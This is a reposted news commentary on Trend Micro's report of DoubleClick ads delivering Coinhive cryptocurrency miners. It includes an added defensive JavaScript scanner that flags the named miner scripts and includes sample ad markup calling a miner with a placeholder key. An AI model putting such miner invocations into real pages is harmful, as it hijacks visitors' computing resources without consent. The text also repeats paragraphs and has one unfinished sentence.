
Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

CyberWisdom Safe Harbor Commentary on Coinhive miners

I couldn’t believe this story from securityaffairs.co that tells an interesting

Trend Micro has seen a surge in the number of cryptocurrency miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads on YouTube and other websites.
The number of cyber attacks against cryptocurrencies has increased due to the rapid rise in the value of currencies such as Bitcoin and Ethereum.

Hackers are targeting almost any party that takes part in cryptocurrency operations: single users, miners, and of course exchanges.

Security companies have discovered several malware applications specifically designed to steal cryptocurrencies, and many websites have been compromised to install scripts that mine virtual coins, abusing the computing resources of unaware visitors.

Researchers at Trend Micro have seen a surge in the number of Coinhive miners in the past few days, apparently related to Google’s DoubleClick ads on YouTube and other websites.

“On January 24, 2018, we found that the number of detected Coinhive miners tripled due to malicious advertising campaigns, and we found that ads found on high-traffic sites use not only Coinhive (Trend Micro as JS_COINHIVE.GN) but also a separate web-mining tool to connect to the private pool,” said Trend Micro’s analysis report.

“We found Coinhive miners up nearly 285% on January 24. We saw traffic increase to five malicious domains on January 18. After scrutinizing network traffic, we found that traffic came from DoubleClick ads.”


The researchers observed two separate web miner scripts, both hosted on AWS, that were invoked from the web page displaying the DoubleClick ads.

The ad uses JavaScript code that generates a random number between 1 and 101. If the number is greater than 10, the ad calls the coinhive.min.js script, which mines using 80% of the CPU. In the remaining 10% of cases, the ad launches a private web miner, the mqoj_1.js script.

“Both webmasters configured a throttle of 0.2, which means miners will use 80% of CPU resources for mining,” the analysis continues.
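An added example (not from Trend Micro's report or the original article) of how a defender could flag this activity in captured ad markup: it looks for the two script file names mentioned above and converts any throttle setting into the CPU share it implies. The sample markup, hosts and site key are constructed placeholders; the `CoinHive.Anonymous` call in the sample follows Coinhive's public API.

```javascript
// Script file names reported on this page; extend the list from your own intel.
const MINER_SCRIPTS = ["coinhive.min.js", "mqoj_1.js"];

// Constructed sample of ad-frame markup (hosts and site key are placeholders).
const SAMPLE_AD_HTML = `
<div id="ad-slot">
  <script src="https://cdn.example.invalid/lib/coinhive.min.js"></script>
  <script src="https://static.example.invalid/jquery.min.js"></script>
  <script>
    var miner = new CoinHive.Anonymous("PLACEHOLDER_SITE_KEY", { throttle: 0.2 });
    miner.start();
  </script>
</div>`;

// Returns a list of findings: known miner script references and throttle settings.
function scanForWebMiners(html) {
  const findings = [];

  // Collect every external script URL and compare its file name to the list.
  const srcRe = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  for (const m of html.matchAll(srcRe)) {
    // Drop query string and fragment, keep the last path segment.
    const file = m[1].split(/[?#]/)[0].split("/").pop().toLowerCase();
    if (MINER_SCRIPTS.includes(file)) {
      findings.push({ type: "script", url: m[1], file });
    }
  }

  // Throttle is the fraction of time the miner stays idle,
  // so the CPU share used for mining is 1 - throttle.
  const throttleRe = /\bthrottle\s*[:=]\s*(0?\.\d+|[01])\b/gi;
  for (const m of html.matchAll(throttleRe)) {
    const throttle = parseFloat(m[1]);
    const cpuPercent = Math.round((1 - throttle) * 100);
    findings.push({ type: "throttle", throttle, cpuPercent });
  }
  return findings;
}

console.log(scanForWebMiners(SAMPLE_AD_HTML));
```

File-name matching alone is easy to evade by renaming the script, so treat a hit as a triage signal alongside network and CPU telemetry.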


Google promptly took action against the ads, which violate its policy by abusing users’ resources.

Blocking JavaScript-based applications from running in the browser can prevent Coinhive miners from executing, and experts recommend regularly patching and updating web browsers to reduce risk.


Trend Micro uncovered a spike in the number of Coinhive miners over the past few days, apparently linked to Google’s DoubleClick ads that are displayed on YouTube and other sites. The number of cyber-attacks against cryptocurrencies has increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum….

thumbnail courtesy of securityaffairs.co.
